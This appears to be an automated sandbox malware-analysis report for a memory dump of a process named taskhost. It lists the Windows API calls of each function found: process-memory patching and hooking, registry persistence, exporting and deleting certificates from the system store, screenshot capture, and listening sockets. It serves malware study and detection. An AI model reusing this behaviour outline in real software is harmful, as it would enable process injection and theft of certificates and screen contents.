Part of subcall function 00506010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 00506162
Part of subcall function 00506010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 005061A4
Part of subcall function 00506010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 005061E6

Part of subcall function 0050680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0050685A
Part of subcall function 0050680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 00506869

Part of subcall function 00519354: FlushFileBuffers.KERNEL32(00000000), ref: 00519360
Part of subcall function 00519354: CloseHandle.KERNEL32(?), ref: 00519368

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

Part of subcall function 005186EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,00506588,00000000), ref: 005186FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0050668B

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 00517BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0050C168,DB84D88A,?,?,?,0050BD76,00000000,00000000,00000004,?,?,0050C160), ref: 00517BC7

VirtualProtectEx.KERNELBASE(000000FF,0050C160,0000001E,00000040,`#R,0050C158,00000004,?,?,?,?,0050BE97,6A005223,00000000), ref: 00517C24
ReadProcessMemory.KERNELBASE(000000FF,0050C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0050BE97,6A005223,00000000), ref: 00517C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00517CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00517CED
VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#R,`#R,?,?,?,?,0050BE97,6A005223,00000000,?,?,0050C160,00522360), ref: 00517D05

Strings

`#R, xrefs: 00517C17, 00517CF7, 00517CFB, 00517C1A, 00517CFA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B3F
GetLastError.KERNEL32(?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B45

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 00514B8B

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

CloseHandle.KERNEL32(?), ref: 00514BB6

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0050BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0050BBE7

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 00512828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0050BC2A

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

WaitForSingleObject.KERNEL32(000000C8), ref: 0050BC62

Part of subcall function 0051763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00519EAB,?,?,00000004), ref: 00517658
Part of subcall function 0051763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00519EAB,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517672
Part of subcall function 0051763A: RegCloseKey.ADVAPI32(00000004,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0050BC98

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 005176B3

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 005176E2

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

RegCloseKey.KERNEL32(?), ref: 00517702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 00517699

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0050BB89
SetThreadPriority.KERNEL32(00000000), ref: 0050BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0050BBA8

Part of subcall function 005131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005131ED
Part of subcall function 005131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00513216
Part of subcall function 005131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00513271
Part of subcall function 005131CC: CloseHandle.KERNEL32(00000000), ref: 0051328E
Part of subcall function 005131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 005132A1
Part of subcall function 005131CC: CloseHandle.KERNEL32(?), ref: 0051330E
Part of subcall function 005131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0051331A
Part of subcall function 005131CC: CloseHandle.KERNEL32(000001E6), ref: 0051332B

WaitForSingleObject.KERNEL32(00001388), ref: 0050BBBD

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00519D6D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(9,00000000,7718F8FF), ref: 00519D8F

Part of subcall function 00517595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00519E26,?,?), ref: 005175AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00519E63

Part of subcall function 0051763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00519EAB,?,?,00000004), ref: 00517658
Part of subcall function 0051763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00519EAB,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517672
Part of subcall function 0051763A: RegCloseKey.ADVAPI32(00000004,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517681

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 00517711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00519E78,?), ref: 0051771E
Part of subcall function 00517711: RegCloseKey.KERNEL32(?), ref: 0051772E

Strings

9, xrefs: 00519D7C

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0050E8E0

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 0051768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 005176B3
Part of subcall function 0051768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 005176E2
Part of subcall function 0051768E: RegCloseKey.KERNEL32(?), ref: 00517702

Strings

Qanyodfyy, xrefs: 0050E8B7, 0050E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 0050E8A7, 0050E8B2, 0050E8BE, 0050E8D9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00516AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AC3
GetLastError.KERNEL32(?,?,005149F4,?,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 00516AC9

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AEF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005149D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 005149E2

Part of subcall function 00516AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AC3
Part of subcall function 00516AAA: GetLastError.KERNEL32(?,?,005149F4,?,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 00516AC9
Part of subcall function 00516AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00512326,000000FF,00522C08), ref: 00514A0E

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

CloseHandle.KERNEL32(?), ref: 00514A23

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00519EAB,?,?,00000004), ref: 00517658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00519EAB,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517672
RegCloseKey.ADVAPI32(00000004,?,?,00519EAB,?,?,00000004,?,00000004), ref: 00517681

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 005120C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00512105
Part of subcall function 005120C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00512172
Part of subcall function 005120C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 005121A7
Part of subcall function 005120C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 005121DB
Part of subcall function 005120C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 005121FA
Part of subcall function 005120C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0051220C
Part of subcall function 005120C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0051221E
Part of subcall function 005120C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00512230
Part of subcall function 005120C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00512242
Part of subcall function 005120C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00512254
Part of subcall function 005120C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0051228D
Part of subcall function 005120C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0051229C
Part of subcall function 005120C4: InitializeCriticalSection.KERNEL32(0052400C,?,?,00000000), ref: 005122C9
Part of subcall function 005120C4: WSAStartup.WS2_32(00000202,?), ref: 005122DF
Part of subcall function 005120C4: CreateEventW.KERNEL32(00522C30,00000001,00000000,00000000,?,?,00000000), ref: 00512300
Part of subcall function 005120C4: GetLengthSid.ADVAPI32(00000000,000000FF,00522C08,?,?,00000000), ref: 00512335
Part of subcall function 005120C4: GetCurrentProcessId.KERNEL32(00000000,022DF7D0,00000000,?,?,00000000), ref: 00512362

Part of subcall function 00512A32: CloseHandle.KERNEL32(00522AF0), ref: 00512AF2

Part of subcall function 0050E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00504E69,?,?,?,743C152E,00000002), ref: 0050E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 00512C62

Part of subcall function 00519837: CoUninitialize.OLE32 ref: 00519845

Part of subcall function 0051D486: CertOpenSystemStoreW.CRYPT32(00000000,00504BBC,?,00000000,00000001), ref: 0051D4A1
Part of subcall function 0051D486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0051D4BD
Part of subcall function 0051D486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0051D4C9
Part of subcall function 0051D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0051D508
Part of subcall function 0051D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0051D538
Part of subcall function 0051D486: CharLowerW.USER32 ref: 0051D556
Part of subcall function 0051D486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0051D561
Part of subcall function 0051D486: CertCloseStore.CRYPT32(?,00000000), ref: 0051D5EA

Part of subcall function 0051D5FB: CertOpenSystemStoreW.CRYPT32(00000000,00504BBC,?,00000001,00512C2A), ref: 0051D606
Part of subcall function 0051D5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00512C2A), ref: 0051D61F
Part of subcall function 0051D5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00512C2A), ref: 0051D62A
Part of subcall function 0051D5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00512C2A), ref: 0051D632
Part of subcall function 0051D5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00512C2A), ref: 0051D63E

Part of subcall function 0051A138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 0051A170

Strings

@, xrefs: 00512C99

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00504E69,?,?,?,743C152E,00000002), ref: 0050E97F

Part of subcall function 0050E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0050E8E0

Part of subcall function 00516B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00516B0A
Part of subcall function 00516B07: CloseHandle.KERNEL32(00000000), ref: 00516B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 0050E95A, 0050E963, 0050E96C, 0050E977

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517477, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

SetLastError.KERNEL32(0000009B,00512AC8,00000000,0050BB5F,00000000,00522AF0,00000000,00000104,76C605D7,00000000), ref: 00517481
CreateThread.KERNEL32(00000000,00522AF0,00522AF0,00522AF0,00000000,00000000), ref: 005174A4

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00519E26,?,?,?,005175CD,?,?,00000000,00000004,?), ref: 0051761F
RegCloseKey.KERNEL32(?,?,005175CD,?,?,00000000,00000004,?,?,?,?,00519E26,?,?), ref: 0051762D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00519E78,?), ref: 0051771E
RegCloseKey.KERNEL32(?), ref: 0051772E

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0050C160,00522360), ref: 0050BE72

Part of subcall function 0050BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,0050C160,00000000,00000000,00000004,?,?,0050C160,00522360), ref: 0050BD86
Part of subcall function 0050BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,0050C160,00522360), ref: 0050BD9C
Part of subcall function 0050BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,0050C160,0050C160,?,?,0050C160,00522360), ref: 0050BDB6

Part of subcall function 00517BF7: VirtualProtectEx.KERNELBASE(000000FF,0050C160,0000001E,00000040,`#R,0050C158,00000004,?,?,?,?,0050BE97,6A005223,00000000), ref: 00517C24
Part of subcall function 00517BF7: ReadProcessMemory.KERNELBASE(000000FF,0050C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0050BE97,6A005223,00000000), ref: 00517C4B
Part of subcall function 00517BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00517CC5
Part of subcall function 00517BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00517CED
Part of subcall function 00517BF7: VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#R,`#R,?,?,?,?,0050BE97,6A005223,00000000,?,?,0050C160,00522360), ref: 00517D05

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00506F38, Relevance: 1.5, APIs: 1, Instructions: 49

APIs

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

WaitForSingleObject.KERNEL32(?,00000000), ref: 00506FB2

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Part of subcall function 00506DE7: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 00506EC8

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00519E26,?,?), ref: 005175AD

Part of subcall function 00517607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00519E26,?,?,?,005175CD,?,?,00000000,00000004,?), ref: 0051761F
Part of subcall function 00517607: RegCloseKey.KERNEL32(?,?,005175CD,?,?,00000000,00000004,?,?,?,?,00519E26,?,?), ref: 0051762D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512507, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 00516B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00516B0A
Part of subcall function 00516B07: CloseHandle.KERNEL32(00000000), ref: 00516B1C

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Non-executed Functions

Function 0051D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00504BBC,?,00000000,00000001), ref: 0051D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0051D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0051D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0051D508

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0051D538
CharLowerW.USER32 ref: 0051D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0051D561

Part of subcall function 0051D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0051D581,?,?,00000000), ref: 0051D43F

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

CertCloseStore.CRYPT32(?,00000000), ref: 0051D5EA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00504BBC,?,00000001,00512C2A), ref: 0051D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00512C2A), ref: 0051D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00512C2A), ref: 0051D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00512C2A), ref: 0051D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00512C2A), ref: 0051D63E

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005164FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00516506
bind.WS2_32(00000000,?,-0000001D), ref: 00516526
listen.WS2_32(00000000,?), ref: 00516535
#3.WS2_32(00000000,?,00504C21,7FFFFFFF,?,00000000,00000080,?,?,?), ref: 00516540

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005167DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 005167E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 00516804
#3.WS2_32(00000000), ref: 0051680F

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0050EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0050EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0050EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0050EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0050EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0050EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0050EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0050EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0050EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0050EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0050EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0050EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0050EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0050EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0050EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0050EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0050EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0050EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0050EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0050EC10
GetIconInfo.USER32(00000000,?), ref: 0050EC25
GetCursorPos.USER32(?), ref: 0050EC33
DrawIcon.USER32(?,?,?,?), ref: 0050ED04

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0050ED85

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

FreeLibrary.KERNEL32(00000000), ref: 0050EE9C
FreeLibrary.KERNEL32(?), ref: 0050EEA6
FreeLibrary.KERNEL32(00000000), ref: 0050EEB0

Strings

gdi32.dll, xrefs: 0050EB02
DISPLAY, xrefs: 0050EBDE
GdipSaveImageToStream, xrefs: 0050EA97
SelectObject, xrefs: 0050EB3A
DeleteObject, xrefs: 0050EB54
GdipDisposeImage, xrefs: 0050EA70
GetDeviceCaps, xrefs: 0050EB2D
CreateCompatibleBitmap, xrefs: 0050EB20
